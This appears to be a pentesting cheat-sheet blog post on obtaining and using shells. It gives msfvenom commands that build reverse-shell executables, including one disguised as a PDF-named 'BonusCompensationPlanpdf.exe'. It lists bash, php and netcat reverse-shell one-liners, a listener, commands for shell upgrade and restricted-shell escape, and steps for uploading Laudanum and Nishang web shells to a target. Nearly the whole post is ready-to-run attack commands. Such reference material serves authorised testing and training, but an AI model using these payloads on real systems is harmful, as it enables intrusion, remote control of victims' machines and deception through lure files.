Home Pentesting - Shell
Post
Cancel

Pentesting - Shell

Create Custom Reverse Shell with online Tool

Interesting website for generating custom reverse shell

https://www.revshells.com/

Create Custom Reverse Shell with msfvenom

Syntax:

1
msfvenom -p <architecture> LHOST=<IP> LPORT=<port> -f <formatPayload> > <outputFile>

Example - create ELF file (Linux executable):

1
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f elf > createbackup.elf

Example - create EXE file (Windows executable):

1
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f exe > BonusCompensationPlanpdf.exe

Examples Reverse Shell

bash

Command syntax:

1
bash -i >& /dev/tcp/<IP>/<port> 0>&1

php

Or

1
php -r '$sock=fsockopen("<IP>",<port>);exec("/bin/sh -i <&3 >&3 2>&3");'

netcat

1
rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <IP> <port> >/tmp/f

More reverse shells: ironHackers

On Windows:

1
nc.exe -nv <IP> <Port> -e cmd.exe

On Linux:

1
nc -nv <IP> <port> -e /bin/bash

Establish the Connection

Syntax:

1
nc -nlvp <port>

Scape Restricted Shell

One way to escape from a restricted reverse shell is to execute the command before opening the session:

1
ssh user@10.129.13.173 -t "whoami"

Interactive Shell (TTY)

Once a shell is obtained, it should always be made interactive:

1
python -c 'import pty;pty.spawn("/bin/bash")'
1
python3 -c 'import pty;pty.spawn("/bin/bash")'
1
/bin/bash -i
1
echo os.system("/bin/bash")
1
2
3
perl —e 'exec "/bin/sh";'

perl: exec "/bin/sh";
1
ruby: exec "/bin/sh"
1
!sh
1
/bin/sh -i
1
awk 'BEGIN {system("/bin/sh")}'
1
find / -name nameoffile -exec /bin/awk 'BEGIN {system("/bin/sh")}' \;
1
find . -exec /bin/sh \; -quit
1
vim -c ':!/bin/sh'

Webshells

Repository Laudanum

Laudanum is a collection of pre-built files designed to be injected into a target system, enabling the attacker to gain access through a reverse shell. It allows running commands on the victim’s host directly from the browser and offers injectable files for various web application languages like asp, aspx, jsp, php, and others. The repository provides attackers with a range of tools to exploit web application vulnerabilities and gain unauthorized access to targeted systems.

Github laudanum

Laudanum Demonstration

  1. Move a Copy for Modification
1
cp /usr/share/webshells/laudanum/aspx/shell.aspx /home/tester/demo.aspx
  1. Modify the Shell for Use
  2. Take Advantage of the Upload Function (if its exists in the web)
  3. Once the upload is successful, you will need to navigate to your web shell to utilize its functions.

Repository Nishang

Nishang is an Offensive PowerShell toolset that can provide options for any portion of your pentest.

https://github.com/samratashok/nishang

Demonstration

  1. Move a Copy for Modification.
1
cp /usr/share/nishang/Antak-WebShell/antak.aspx /home/administrator/Upload.aspx
  1. Same steps as in the previous section.

PHP web shells

Github Repository PHP webshell

Webshell in PHP with Graphic interface:

https://github.com/Arrexel/phpbash

This post is licensed under CC BY 4.0 by the author.